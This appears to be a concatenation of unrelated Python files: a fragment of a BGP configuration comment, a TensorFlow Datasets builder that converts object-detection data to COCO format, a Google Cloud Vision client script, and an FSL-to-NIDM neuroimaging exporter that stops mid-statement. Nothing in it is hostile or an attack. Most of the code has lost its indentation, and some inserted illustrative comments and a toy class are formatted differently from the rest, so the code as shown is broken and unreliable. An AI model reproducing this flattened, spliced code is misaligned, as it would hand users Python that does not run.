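#   cfg.restart_time = 120          # uint16 restricted to the range 0..4096
#   cfg.stale_routes_time = 360.0   # decimal64 with precision 2
#   cfg.helper_only = False
# Out-of-range or wrongly typed values raise the ValueError built by _set_*().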
|
|
# Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tool for converting raw object detection data into the COCO format."""
import abc
import collections
import hashlib
import json
import os
from typing import Any, Generator, Iterable, Mapping, MutableMapping, Optional, Set, Tuple
import six
import tensorflow.compat.v1 as tf
import tensorflow_datasets.public_api as tfds
import image_utils
from object_detection.object_detection_data import bbox_utils
# The Type for a processed example. It is expected to contain the ID and the
# TFDS-compatible map.
ProcessedExample = Tuple[int, Mapping[str, Any]]
_VERSION = '0.1.0'
class ObjectDetectionConfig(tfds.core.BuilderConfig, abc.ABC):
"""Base Class for an input config to ImageClassificationData.
An implementation of ImageClassificationDataConfig includes an example
generator that yields `dict` objects with the essential inputs necessary for
converting raw data into the Object Detection format.
"""
@property
@abc.abstractmethod
def num_labels(self) -> int:
"""The number of distinct labels in the dataset."""
raise NotImplementedError
@property
@abc.abstractmethod
def bbox_format(self) -> bbox_utils.BBoxFormat:
"""Refer to documentation in bbox_utils for more information."""
raise NotImplementedError
@property
@abc.abstractmethod
def supported_modes(self) -> Set[str]:
"""Returns a list of the supported modes for this dataset.
Returns:
A `Set` consisting of a set of 'train', 'test', 'validation'.
"""
raise NotImplementedError
@abc.abstractmethod
def example_generator(self, mode: str):
"""The example generator for the dataset that yields essential inputs.
Args:
mode: `str` indicating the mode. One of the following:
'train', 'validation', 'test'
Yields:
`dict` with the following:
'image_path_or_name': `str` representing the path to the image that is
loadable with `tf.io.gfile.GFile` or the file name. If a file name is
provided instead, then 'image_fobj' must be provided.
'image_fobj': An optional key representing an opened image, (e.g.
open(image_path, 'rb')). This must be provided if 'image_path_or_name'
is not a loadable path.
'image_id': An optional key that can be provided that represents an
integer ID for the image. If not provided, one will be generated,
but note that generated IDs may not be consistent between runs.
'bbox_info': The list of corresponding bounding box information. Each
bounding box should be represented as a dict with keys:
'bbox': the tuple representing a bounding box with the format
specified in `bbox_format`.
'label': the class label of the corresponding bounding box, or the
string representation of the label.
'label_id': An optional field that can be provided if 'label' is
the string representation of the label. If not provided, then an
id will be generated, but note that generated IDs may not be
consistent between runs.
'annotation_id': An optional field that represents the ID of the
bounding box annotation. If not provided, an id will be generated,
but note that generated IDs may not be consistent between runs.
"""
raise NotImplementedError
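# ---------------------------------------------------------------------------
# Hedged illustration (not part of the original module): a minimal concrete
# ObjectDetectionConfig. The 'toy_boxes' name, the hard-coded image path and
# the single bounding box below are placeholders invented for this sketch;
# only the yielded dict keys follow the contract documented above.
class _ToyDetectionConfig(ObjectDetectionConfig):
  """Toy config that yields one hard-coded example for the 'train' split."""

  def __init__(self, **kwargs):
    super(_ToyDetectionConfig, self).__init__(
        name='toy_boxes', version=_VERSION, **kwargs)

  @property
  def num_labels(self) -> int:
    return 2

  @property
  def bbox_format(self) -> bbox_utils.BBoxFormat:
    # Assumes boxes are provided as normalized (xmin, xmax, ymin, ymax).
    return bbox_utils.BBoxFormat.NORMALIZED_MIN_MAX

  @property
  def supported_modes(self) -> Set[str]:
    return {'train'}

  def example_generator(self, mode: str):
    del mode  # Only one split in this sketch.
    yield {
        'image_path_or_name': '/tmp/example.jpg',  # placeholder path
        'bbox_info': [{'bbox': (0.1, 0.5, 0.2, 0.6), 'label': 'cat'}],
    }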
class ObjectDetectionBuilder(tfds.core.GeneratorBasedBuilder):
"""A TFDS Dataset Builder for Object Detection Datasets.
This Builder converts raw object detection data into TFDS records given an
implementation of ObjectDetectionConfig. It also creates a JSON annotation
file in the same format as COCO.
Example usage:
```
config = [implementation of ObjectDetectionConfig](...)
dataset = ObjectDetectionBuilder(config=config)
dataset.download_and_prepare()
```
"""
VERSION = tfds.core.Version(_VERSION)
def __init__(self,
data_dir: Optional[str] = None,
config: ObjectDetectionConfig = None,
version: Optional[tfds.core.Version] = None,
**kwargs):
"""Refer to `tensorflow_datasets.core.dataset_builder`.
Args:
data_dir: The directory used to save TFDS converted data.
config: The ObjectDetectionConfig implementation.
version: A TFDS version, if applicable.
**kwargs: Keyword arguments passed to super.
"""
super(ObjectDetectionBuilder, self).__init__(data_dir=data_dir,
config=config,
version=version,
**kwargs)
self._label_id_map = {}
self._id_manager = collections.Counter()
self._json_dict = {}
def _info(self) -> tfds.core.DatasetInfo:
"""Refer to `tensorflow_datasets.core.dataset_builder`."""
if not issubclass(type(self.builder_config), ObjectDetectionConfig):
raise ValueError('Provided config is not the correct type. Please provide'
' a config inheriting ObjectDetectionConfig.')
n_labels = self.builder_config.num_labels
return tfds.core.DatasetInfo(
builder=self,
features=tfds.features.FeaturesDict({
'image': {
'height': tfds.features.Tensor(shape=(), dtype=tf.int64),
'width': tfds.features.Tensor(shape=(), dtype=tf.int64),
'filename': tfds.features.Text(),
'source_id': tfds.features.Tensor(shape=(), dtype=tf.int64),
'encoded': tfds.features.Image(encoding_format='jpeg'),
'format': tfds.features.Text(),
'key': {
'sha256': tfds.features.Text(),
},
'object': tfds.features.Sequence({
'bbox': tfds.features.BBoxFeature(),
'class': {
'text': tfds.features.Text(),
'label': tfds.features.ClassLabel(num_classes=n_labels),
}})
}
}))
def _split_generators(
self,
dl_manager: tfds.download.DownloadManager
) -> Iterable[tfds.core.SplitGenerator]:
"""Defines the splits for TFDS builder."""
split_generators = []
if 'train' in self.builder_config.supported_modes:
split_generators.append(
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={
'mode': 'train',
},
),
)
if 'validation' in self.builder_config.supported_modes:
split_generators.append(
tfds.core.SplitGenerator(
name=tfds.Split.VALIDATION,
gen_kwargs={
'mode': 'validation',
},
),
)
if 'test' in self.builder_config.supported_modes:
split_generators.append(
tfds.core.SplitGenerator(
name=tfds.Split.TEST,
gen_kwargs={
'mode': 'test',
},
),
)
return split_generators
def _get_id(self, id_family: str) -> int:
"""Simple ID generator based on a counter.
This is a simple ID generator that assigns IDs based on the number of items
counted.
Args:
id_family: The string representation of the 'family' of which to generate
an id.
Returns:
The family member's ID.
"""
res = self._id_manager[id_family]
self._id_manager[id_family] += 1
return res
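  # Hedged illustration: successive calls count up independently per family
  # within one builder instance, e.g. _get_id('image') returns 0, 1, 2, ...
  # while _get_id('annotation') keeps its own separate counter.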
def _convert_raw_example(
self,
mode_dict: MutableMapping[str, Any],
example: Mapping[str, Any]) -> ProcessedExample:
"""Converts the raw data in the example into a TFDS compatible format.
Args:
mode_dict: `defaultdict(list)` used to populate the COCO style JSON file.
example: A `dict` as specified in ObjectDetectionConfig.
Returns:
A tuple consisting of image_id (`int`) and a `dict` for TFDS.
Raises:
ImageDecodingError if the example image is not formatted properly.
InvalidBBoxError if the example bounding box is not formatted properly.
"""
img_path = example['image_path_or_name']
base_name = os.path.basename(img_path)
img_fobj = example.get('image_fobj', tf.io.gfile.GFile(img_path, 'rb'))
img_bytes, img_shape = image_utils.image_to_jpeg(fobj=img_fobj,
filename=base_name)
img_format = 'JPEG'
key = hashlib.sha256(img_bytes.read()).hexdigest()
img_bytes.seek(0)
bboxes = example['bbox_info']
processed_bboxes = []
img_height = img_shape[0]
img_width = img_shape[1]
img_id = example.get('image_id', self._get_id('image'))
mode_dict['images'].append({
'id': img_id,
'width': img_width,
'height': img_height,
})
for bbox_info in bboxes:
annotations_bbox = bbox_info['bbox']
bbox = bbox_utils.BBox(bbox=annotations_bbox,
fmt=self.builder_config.bbox_format,
img_width=img_width,
img_height=img_height)
label = bbox_info['label']
if isinstance(label, int):
text = str(label)
elif isinstance(label, six.string_types):
text = label
label = bbox_info.get('label_id', self._get_label_id(text))
else:
raise TypeError(
'The provided label was not a string or int. Got: {}'.format(
type(label)))
if label >= self.builder_config.num_labels:
raise ValueError('Provided label {} for {} is greater than '
'the number of classes specified. num_classes: '
'{}'.format(label,
base_name,
self.builder_config.num_labels))
annotation_id = example.get('annotation_id', self._get_id('annotation'))
bbox.convert(bbox_utils.BBoxFormat.NORMALIZED_MIN_MAX)
xmin, xmax, ymin, ymax = bbox.as_tuple()
bbox = bbox.convert(bbox_utils.BBoxFormat.WIDTH_HEIGHT)
mode_dict['annotations'].append({
'id': annotation_id,
'image_id': img_id,
'category_id': label,
'bbox': annotations_bbox,
})
processed_bboxes.append({
'bbox': tfds.features.BBox(ymin=ymin,
xmin=xmin,
ymax=ymax,
xmax=xmax),
'class': {
'text': text,
'label': label,
}
})
return img_id, {
'image': {
'height': img_height,
'width': img_width,
'filename': img_path,
'source_id': img_id,
'encoded': img_bytes,
'format': img_format,
'key': {
'sha256': key,
},
'object': processed_bboxes,
}
}
def _generate_examples(
self, mode: str) -> Generator[ProcessedExample, None, None]:
"""Process specified examples into required TFDS outputs."""
if mode not in self._json_dict:
self._json_dict[mode] = collections.defaultdict(list)
generator = self.builder_config.example_generator(mode)
for example in generator:
img_id, processed_example = self._convert_raw_example(
self._json_dict[mode], example)
yield img_id, processed_example
def _get_label_id(self, label: str) -> int:
"""If the class label was not provided as an int, create the class id."""
try:
return self._label_id_map[label]
except KeyError:
label_id = self._get_id('label')
self._label_id_map[label] = label_id
return label_id
def download_and_prepare(self, **kwargs) -> None:
super(ObjectDetectionBuilder, self).download_and_prepare(**kwargs)
categories_list = list(range(self.builder_config.num_labels))
for mode in self.builder_config.supported_modes:
self._json_dict[mode]['categories'] = categories_list
json_path = os.path.join(self._data_dir, 'instances_{}.json'.format(mode))
with open(json_path, 'w') as f:
json.dump(self._json_dict[mode], f)
tf.logging.info('Created JSON file {}'.format(json_path))
|
|
#!/usr/bin/env python
"""sorno_cloud_vision.py makes using the Google Cloud Vision API easier.
Doc: https://cloud.google.com/vision/docs
The script generates requests for the given photos, sends the requests to Cloud
Vision, then puts the results into the corresponding response files.
Copyright 2016 Heung Ming Tai
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import argparse
import base64
import httplib2
import json
import logging
import os
import sys
from apiclient import discovery
import humanfriendly
from oauth2client import client as oauthclient
from sorno import loggingutil
_log = logging.getLogger()
_plain_logger = None # will be created in main()
_plain_error_logger = None # will be created in main()
class CloudVisionApp(object):
"""A console application to do work"""
def __init__(
self,
args,
):
"""
Args:
args (argparse.Namespace): The flags for the script.
"""
self.args = args
self.http = None
# Endpoint for accessing the cloud vision api with api key
self.endpoint = None
# Google api client
self.service = None
def run(self):
use_api_key = False
self.http = httplib2.Http()
if self.args.api_key:
self.endpoint = (
"https://vision.googleapis.com/v1/images:annotate?key=" +
self.args.api_key
)
use_api_key = True
if not use_api_key:
if not os.getenv("GOOGLE_APPLICATION_CREDENTIALS"):
_plain_error_logger.fatal(
"You need to specify --api-key or set the"
" environment variable GOOGLE_APPLICATION_CREDENTIALS."
" See https://cloud.google.com/vision/docs/getting-started."
)
sys.exit(1)
credentials = oauthclient.GoogleCredentials.get_application_default(
).create_scoped(
['https://www.googleapis.com/auth/cloud-platform']
)
credentials.authorize(self.http)
api_discovery_file = (
'https://vision.googleapis.com/$discovery/rest?version=v1'
)
self.service = discovery.build(
'vision',
'v1',
http=self.http,
discoveryServiceUrl=api_discovery_file,
)
getsize = os.path.getsize
size_limit = None
if self.args.size_limit:
size_limit = humanfriendly.parse_size(self.args.size_limit)
_log.info("Size limit is %s bytes", "{:,}".format(size_limit))
for f in self.args.files:
_log.info("Process photo: %s", f)
if size_limit:
    size = getsize(f)
    if size > size_limit:
        _log.info(
            "File size is %s, greater than the limit %s, skipped",
            "{:,}".format(size),
            "{:,}".format(size_limit),
        )
        continue
with open(f, "rb") as image:
image_content = base64.b64encode(image.read())
if use_api_key:
resp_content = self._process_with_api_key(image_content)
else:
resp_content = self._process_with_credentials(image_content)
output_filepath = f + ".output.txt"
_log.info("Writing output for %s to %s", f, output_filepath)
with open(output_filepath, "w") as output:
output.write(
resp_content.decode("unicode-escape").encode("utf8")
)
return 0
def _process_with_api_key(self, image_content):
service_request_json = json.dumps(
self._create_request_body(image_content)
)
if self.args.debug:
self._write_request_for_debug(service_request_json)
(resp, content) = self.http.request(
self.endpoint,
"POST",
headers={
'Content-Type': "application/json",
},
body=service_request_json,
)
_log.info("Response: %s", resp)
return content
def _process_with_credentials(self, image_content):
request = self._create_request_body(image_content)
if self.args.debug:
self._write_request_for_debug(json.dumps(request, indent=4))
client_request = self.service.images().annotate(body=request)
response = client_request.execute()
return json.dumps(response, indent=4)
def _write_request_for_debug(self, request_json):
request_filepath = "cloud-vision-request.json"
_log.info("Writing request to %s", request_filepath)
with open(request_filepath, "w") as f:
f.write(request_json)
def _create_request_body(self, image_content):
return {
'requests': [
{
'image': {
'content': image_content
},
'features': [
{
'type': "LABEL_DETECTION",
"maxResults": 20,
},
{
'type': "TEXT_DETECTION",
"maxResults": 5,
},
# {
# 'type': "FACE_DETECTION",
# "maxResults": 10,
# },
{
'type': "LANDMARK_DETECTION",
"maxResults": 3,
},
{
'type': "LOGO_DETECTION",
"maxResults": 5,
},
{
'type': "SAFE_SEARCH_DETECTION",
"maxResults": 10,
},
# {
# 'type': "IMAGE_PROPERTIES",
# "maxResults": 10,
# },
]
},
]
}
def parse_args(cmd_args):
description = __doc__.split("Copyright 2016")[0].strip()
parser = argparse.ArgumentParser(
description=description,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument(
"--debug",
action="store_true",
)
parser.add_argument(
"--api-key",
)
parser.add_argument(
"--size-limit",
help="Skip files which have size higher than this limit."
" Cloud Vision only supports up to 4MB. You can use any string that"
" represents a size like '4MB', '3K', '5G'.",
)
parser.add_argument(
"files",
metavar='file',
nargs="+",
)
args = parser.parse_args(cmd_args)
return args
def main():
global _plain_logger, _plain_error_logger
args = parse_args(sys.argv[1:])
loggingutil.setup_logger(_log, debug=args.debug)
_plain_logger = loggingutil.create_plain_logger(
"PLAIN",
debug=args.debug,
)
_plain_error_logger = loggingutil.create_plain_logger(
"PLAIN_ERROR",
debug=args.debug,
stdout=False,
)
app = CloudVisionApp(
args,
)
sys.exit(app.run())
if __name__ == '__main__':
main()
|
|
"""
Export neuroimaging results created with feat in FSL following NIDM-Results
specification.
@author: Camille Maumet <[email protected]>
@copyright: University of Warwick 2013-2014
"""
import re
import os
import sys
import glob
import json
import numpy as np
import subprocess
import warnings
import nibabel as nib
# If "nidmresults" code is available locally work on the source code (used
# only for development)
FSL_EXPORTER_DIR = os.path.dirname(os.path.realpath(__file__))
NIDM_FSL_DIR = os.path.dirname(FSL_EXPORTER_DIR)
NIDM_RESULTS_FSL_DIR = os.path.dirname(NIDM_FSL_DIR)
NIDM_RESULTS_SRC_DIR = os.path.join(
os.path.dirname(NIDM_RESULTS_FSL_DIR), "nidmresults")
if os.path.isdir(NIDM_RESULTS_SRC_DIR):
sys.path.append(NIDM_RESULTS_SRC_DIR)
from nidmresults.exporter import NIDMExporter
from nidmresults.objects.constants import *
from nidmresults.objects.modelfitting import *
from nidmresults.objects.contrast import *
from nidmresults.objects.inference import *
from nidmfsl.fsl_exporter.objects.fsl_objects import *
class FSLtoNIDMExporter(NIDMExporter, object):
"""
Parse an FSL result directory to extract the pieces of information to be
stored in NIDM-Results and generate a NIDM-Results export.
"""
def __init__(self, *args, **kwargs):
super(FSLtoNIDMExporter, self).__init__()
self.feat_dir = kwargs.pop('feat_dir')
nidm_dirs = glob.glob(os.path.join(self.feat_dir, 'nidm****'))
if nidm_dirs:
if nidm_dirs[-1] == os.path.join(self.feat_dir, 'nidm'):
export_dir_num = 1
else:
m = re.search('(?<=nidm_).*', nidm_dirs[-1])
export_dir_num = int(m.group(0)) + 1
self.export_dir = os.path.join(
self.feat_dir, 'nidm' + "_{0:0>4}".format(export_dir_num))
else:
self.export_dir = os.path.join(self.feat_dir, 'nidm')
self.design_file = os.path.join(self.feat_dir, 'design.fsf')
# FIXME: maybe not always "4"?
feat_post_log_file = os.path.join(self.feat_dir, 'logs', 'feat4_post')
# FIXME: this file is sometimes missing, can the connectivity info
# be retrieved from somewhere else?
if os.path.isfile(feat_post_log_file):
self.feat_post_log = open(feat_post_log_file, 'r')
else:
self.feat_post_log = None
self.version = kwargs.pop('version')
self.coord_space = None
self.contrast_names_by_num = dict()
def parse(self):
"""
Parse an FSL result directory to extract the pieces of information to be
stored in NIDM-Results.
"""
# Load design.fsf file
design_file_open = open(self.design_file, 'r')
self.design_txt = design_file_open.read()
# Load feat post log file
if self.feat_post_log is not None:
self.feat_post_log = self.feat_post_log.read()
fmri_level_re = r'.*set fmri\(level\) (?P<info>\d+).*'
fmri_level = int(self._search_in_fsf(fmri_level_re))
self.first_level = (fmri_level == 1)
# FIXME cope1
if self.first_level:
# stat_dir = list([os.path.join(self.feat_dir, 'stats')])
self.analysis_dirs = list([self.feat_dir])
else:
# If feat was called with the GUI then the analysis directory is in
# the nested cope folder
self.analysis_dirs = glob.glob(
os.path.join(self.feat_dir, 'cope*.feat'))
if not self.analysis_dirs:
self.analysis_dirs = list([self.feat_dir])
# cope_dirs
# print cope_dirs
# stat_dir = os.path.join(self.feat_dir, 'cope1.feat', 'stats')
# analysis_dir = os.path.join(self.feat_dir, 'cope1.feat')
super(FSLtoNIDMExporter, self).parse()
def _add_namespaces(self):
"""
Overload of parent _add_namespaces to add FSL namespace.
"""
super(FSLtoNIDMExporter, self)._add_namespaces()
self.doc.add_namespace(FSL)
def _find_software(self):
"""
Return an object of type Software describing the version of FSL used to
compute the current analysis.
"""
version_re = r'.*set fmri\(version\) (?P<info>\d+\.?\d+).*'
feat_version = self._search_in_fsf(version_re)
software = Software(feat_version=feat_version)
return software
def _find_model_fitting(self):
"""
Parse FSL result directory to retrieve model fitting information.
Return a list of objects of type ModelFitting.
"""
self.model_fittings = dict()
for analysis_dir in self.analysis_dirs:
stat_dir = os.path.join(analysis_dir, 'stats')
design_matrix = self._get_design_matrix(analysis_dir)
data = self._get_data()
error_model = self._get_error_model()
rms_map = self._get_residual_mean_squares_map(stat_dir)
param_estimates = self._get_param_estimate_maps(stat_dir)
mask_map = self._get_mask_map(analysis_dir)
grand_mean_map = self._get_grand_mean(mask_map.file, analysis_dir)
activity = self._get_model_parameters_estimations(error_model)
model_fitting = ModelFitting(
activity, design_matrix, data,
error_model, param_estimates, rms_map, mask_map,
grand_mean_map)
self.model_fittings[analysis_dir] = model_fitting
return self.model_fittings
def _find_contrasts(self):
"""
Parse FSL result directory to retrieve information about contrasts.
Return a dictionary of (key, value) pairs where key is a tuple
containing the identifier of a ModelParametersEstimation object and a
tuple of identifiers of ParameterEstimateMap objects, and value is an
object of type Contrast.
"""
for analysis_dir in self.analysis_dirs:
# Retrieve the Model Parameters Estimations activity corresponding
# to current analysis directory.
mf_id = self.model_fittings[analysis_dir].activity.id
stat_dir = os.path.join(analysis_dir, 'stats')
# Degrees of freedom
# FIXME: check what happens when more than one contrast is
# performed
dof_file = open(os.path.join(stat_dir, 'dof'), 'r')
dof = float(dof_file.read())
exc_sets = glob.glob(os.path.join(analysis_dir,
'thresh_z*.nii.gz'))
contrasts = dict()
for filename in exc_sets:
s = re.compile('zf?stat\d+')
zstatnum = s.search(filename)
zstatnum = zstatnum.group()
if zstatnum.startswith("zstat"):
stat_type = "T"
con_num = zstatnum.replace('zstat', '')
elif zstatnum.startswith("zfstat"):
stat_type = "F"
con_num = zstatnum.replace('zfstat', '')
# If more than one excursion set is reported, we need to
# use an index in the file names of the file exported in
# nidm
if len(exc_sets) > 1:
stat_num = "_" + \
stat_type.upper() + "{0:0>3}".format(con_num)
else:
stat_num = ""
# Contrast name
name_re = r'.*set fmri\(conname_real\.' + con_num +\
'\) "(?P<info>[^"]+)".*'
contrast_name = self._search_in_fsf(name_re)
self.contrast_names_by_num[con_num] = contrast_name
# Contrast estimation activity
estimation = ContrastEstimation(con_num, contrast_name)
# Contrast weights
weights_re = r'.*set fmri\(con_real' + con_num +\
'\.\d+\) (?P<info>-?\d+)'
weight_search = re.compile(weights_re)
contrast_weights = str(
re.findall(weight_search,
self.design_txt)).replace("'", '')
weights = ContrastWeights(stat_num, contrast_name,
contrast_weights, stat_type)
# Find which parameter estimates were used to compute the
# contrast
pe_ids = list()
pe_index = 1
contrast_weights = contrast_weights.replace(' ', '')
contrast_weights = contrast_weights.replace('[', '')
contrast_weights = contrast_weights.replace(']', '')
contrast_weights = contrast_weights.split(',')
# Whenever a "1" is found in contrast_weights, the
# parameter estimate map identified by the corresponding
# index is in use
for beta_index in contrast_weights:
if int(beta_index) == 1:
for model_fitting in self.model_fittings.values():
for pe in model_fitting.param_estimates:
s = re.compile('pe\d+')
pe_num = s.search(pe.file)
pe_num = pe_num.group()
pe_num = pe_num.replace('pe', '')
if int(pe_num) == pe_index:
pe_ids.append(pe.id)
pe_index += 1
# Convert to immutable tuple to be used as key
pe_ids = tuple(pe_ids)
# Statistic Map
stat_file = os.path.join(
stat_dir,
stat_type.lower() + 'stat' + str(con_num) + '.nii.gz')
stat_map = StatisticMap(
stat_file, stat_type, stat_num,
contrast_name, dof, self.coord_space,
self.export_dir)
# Z-Statistic Map
z_stat_file = os.path.join(
stat_dir,
'zstat' + str(con_num) + '.nii.gz')
z_stat_map = StatisticMap(
z_stat_file, 'Z', stat_num,
contrast_name, dof, self.coord_space,
self.export_dir)
if stat_type is "T":
# Contrast Map
con_file = os.path.join(stat_dir,
'cope' + str(con_num) + '.nii.gz')
contrast_map = ContrastMap(con_file, stat_num,
contrast_name, self.coord_space,
self.export_dir)
# Contrast Variance and Standard Error Maps
varcontrast_file = os.path.join(
stat_dir, 'varcope' + str(con_num) + '.nii.gz')
is_variance = True
std_err_map = ContrastStdErrMap(
stat_num,
varcontrast_file, is_variance, self.coord_space,
self.coord_space, self.export_dir)
std_err_map_or_mean_sq_map = std_err_map
elif stat_type is "F":
contrast_map = None
sigma_sq_file = os.path.join(
stat_dir, 'sigmasquareds.nii.gz')
expl_mean_sq_map = ContrastExplainedMeanSquareMap(
stat_file, sigma_sq_file, stat_num,
self.coord_space, self.export_dir)
std_err_map_or_mean_sq_map = expl_mean_sq_map
else:
raise Exception("Unknown statistic type: "+stat_type)
con = Contrast(
con_num, contrast_name, weights, estimation,
contrast_map, std_err_map_or_mean_sq_map, stat_map,
z_stat_map)
contrasts.setdefault((mf_id, pe_ids), list()).append(con)
return contrasts
def _find_inferences(self):
"""
Parse FSL result directory to retrieve information about inference
along with peaks and clusters. Return a dictionary of (key, value)
pairs where key is the identifier of a ContrastEstimation object and
value is an object of type Inference.
"""
inferences = dict()
for analysis_dir in self.analysis_dirs:
exc_sets = glob.glob(os.path.join(analysis_dir,
'thresh_z*.nii.gz'))
# Find excursion sets (in a given feat directory we have one
# excursion set per contrast)
for filename in exc_sets:
s = re.compile('zf?stat\d+')
zstatnum = s.search(filename)
zstatnum = zstatnum.group()
if zstatnum.startswith("zstat"):
stat_type = "T"
stat_num = zstatnum.replace('zstat', '')
elif zstatnum.startswith("zfstat"):
stat_type = "F"
stat_num = zstatnum.replace('zfstat', '')
# If more than one excursion set is reported, we need to use
# an index in the file names of the file exported in nidm
if len(exc_sets) > 1:
stat_num_t = "_" + \
stat_type.upper() + "{0:0>3}".format(stat_num)
else:
stat_num_t = ""
# Find corresponding contrast estimation activity
con_id = None
for contrasts in self.contrasts.values():
for contrast in contrasts:
s = re.compile('zf?stat\d+')
con_num = s.search(contrast.z_stat_map.file)
con_num = con_num.group()
con_num = con_num.replace('zstat', '')\
.replace('zfstat', '')\
.replace('.nii.gz', '')
if con_num == stat_num:
con_id = contrast.estimation.id
assert con_id is not None
# Inference activity
inference_act = InferenceActivity(
stat_num,
self.contrast_names_by_num[stat_num])
# Excursion set
visualisation = os.path.join(
analysis_dir,
'rendered_thresh_zstat' + stat_num + '.png')
zFileImg = os.path.join(analysis_dir,
'thresh_zstat' + stat_num + '.nii.gz')
exc_set = ExcursionSet(zFileImg, stat_num_t, visualisation,
self.coord_space, self.export_dir)
# Height Threshold
prob_re = r'.*set fmri\(prob_thresh\) (?P<info>\d+\.?\d+).*'
z_re = r'.*set fmri\(z_thresh\) (?P<info>\d+\.?\d+).*'
type_re = r'.*set fmri\(thresh\) (?P<info>\d+).*'
prob_thresh = float(self._search_in_fsf(prob_re))
z_thresh = float(self._search_in_fsf(z_re))
thresh_type = int(self._search_in_fsf(type_re))
# FIXME: deal with 0 = no thresh?
voxel_uncorr = (thresh_type == 1)
voxel_corr = (thresh_type == 2)
cluster_thresh = (thresh_type == 3)
stat_threshold = None
extent_p_corr = None
p_corr_threshold = None
p_uncorr_threshold = None
if voxel_uncorr:
p_uncorr_threshold = prob_thresh
elif voxel_corr:
p_corr_threshold = prob_thresh
else:
stat_threshold = z_thresh
extent_p_corr = prob_thresh
height_thresh = HeightThreshold(
stat_threshold,
p_corr_threshold, p_uncorr_threshold)
# Extent Threshold
extent_thresh = ExtentThreshold(p_corr=extent_p_corr)
# There is not table display listing peaks and clusters for
# voxelwise correction
if cluster_thresh:
# Clusters (and associated peaks)
clusters = self._get_clusters_peaks(stat_num)
# Peak and Cluster Definition Criteria
peak_criteria = PeakCriteria(
stat_num,
self._get_num_peaks(), self._get_peak_dist())
clus_criteria = ClusterCriteria(
stat_num,
self._get_connectivity())
else:
clusters = None
peak_criteria = None
clus_criteria = None
# FIXME: for now only based on conmask1_1
m = re.search(
r"set fmri\(conmask1_1\) (?P<con_maskg>\d+)",
self.design_txt)
assert m is not None
contrast_masking = bool(int(m.group("con_maskg")))
if contrast_masking:
# Display mask
# FIXME deal with the case in which we are contrast masking by
# more than one contrast
# contrast_masking_search = re.compile(r'.*set
# fmri\(conmask'+contrast_num+'_(?P<maskingconnum>\d+)\)
# (?P<domask>\d+).*')
# contrast_masking_found =
# contrast_masking_search.search(self.design_txt)
# do_contrast_masking =
# float(contrast_masking_found.group('domask'))
# if do_contrast_masking:
# contrast_masking_num =
# contrast_masking_found.group('maskingconnum')
# contrast_masking_file =
# else:
# contrast_masking_num = None
# FIXME: We need an example with more than one contrast to code
# contrast masking
contrast_masking_file = self._get_display_mask()
display_mask = DisplayMaskMap(
stat_num,
contrast_masking_file, self.coord_space,
self.export_dir)
else:
display_mask = None
# Search space
search_space = self._get_search_space(analysis_dir)
inference = Inference(
self.version,
inference_act, height_thresh,
extent_thresh, peak_criteria, clus_criteria,
display_mask, exc_set, clusters, search_space,
self.software.id)
inferences.setdefault(con_id, list()).append(inference)
return inferences
def _get_design_matrix(self, analysis_dir):
"""
Parse FSL result directory to retrieve information about the design
matrix. Return an object of type DesignMatrix.
"""
design_mat_file = os.path.join(analysis_dir, 'design.mat')
design_mat_fid = open(design_mat_file, 'r')
design_mat_values = np.loadtxt(design_mat_fid, skiprows=5, ndmin=2)
design_mat_image = os.path.join(analysis_dir, 'design.png')
# Regressor names (not taking into account HRF model)
regnames_re = r'.*set fmri\(evtitle\d+\).*'
ev_names = re.findall(regnames_re, self.design_txt)
orig_ev = dict()
for ev_name in ev_names:
regname_re = r'.*set fmri\(evtitle(?P<num>\d+)\)\s*"(?P<name>.*)"'
info_search = re.compile(regname_re)
info_found = info_search.search(ev_name)
num = info_found.group('num')
name = info_found.group('name')
orig_ev[int(num)] = name
# For first-level fMRI only
if self.first_level:
# Design-type: event, mixed or block
# FIXME: deal with other options than "custom"
onsets_re = r'.*set fmri\(custom(?P<num>\d+)\)\s*"(?P<file>.*)".*'
r = re.compile(onsets_re)
onsets = [m.groupdict() for m in r.finditer(self.design_txt)]
max_duration = 0
min_duration = 36000
for onset in onsets:
if os.path.isfile(onset['file']):
aa = np.loadtxt(onset['file'])
max_duration = max(
max_duration, np.amax(aa[:, 2], axis=None))
min_duration = min(
min_duration, np.amin(aa[:, 2], axis=None))
else:
missing_onset_file = onset['file']
max_duration = None
if max_duration is not None:
if max_duration <= 1:
design_type = NIDM_EVENT_RELATED_DESIGN
elif min_duration > 1:
design_type = NIDM_BLOCK_BASED_DESIGN
else:
design_type = NIDM_MIXED_DESIGN
else:
warnings.warn(
"Onset file " + missing_onset_file + " not found, " +
"design type will not be reported")
design_type = None
# HRF model (only look at first ev)
m = re.search(
r"set fmri\(convolve1\) (?P<hrf>\d)", self.design_txt)
assert m is not None
hrf = int(m.group("hrf"))
if hrf == 1: # 1: Gaussian
hrf_model = NIDM_GAUSSIAN_HRF
elif hrf == 2: # 2 : Gamma
hrf_model = NIDM_GAMMA_HRF
elif hrf == 3: # 3 : Double-Gamma HRF
hrf_model = FSL_FSLS_GAMMA_DIFFERENCE_HRF
elif hrf == 4: # 4 : Gamma basis functions
hrf_model = NIDM_GAMMA_HRB
elif hrf == 5: # 5 : Sine basis functions
hrf_model = NIDM_SINE_BASIS_SET
elif hrf == 6: # 6 : FIR basis functions
hrf_model = NIDM_FINITE_IMPULSE_RESPONSE_HRB
# Drift model
m = re.search(
r"set fmri\(paradigm_hp\) (?P<cut_off>\d+)", self.design_txt)
assert m is not None
cut_off = float(m.group("cut_off"))
drift_model = DriftModel(
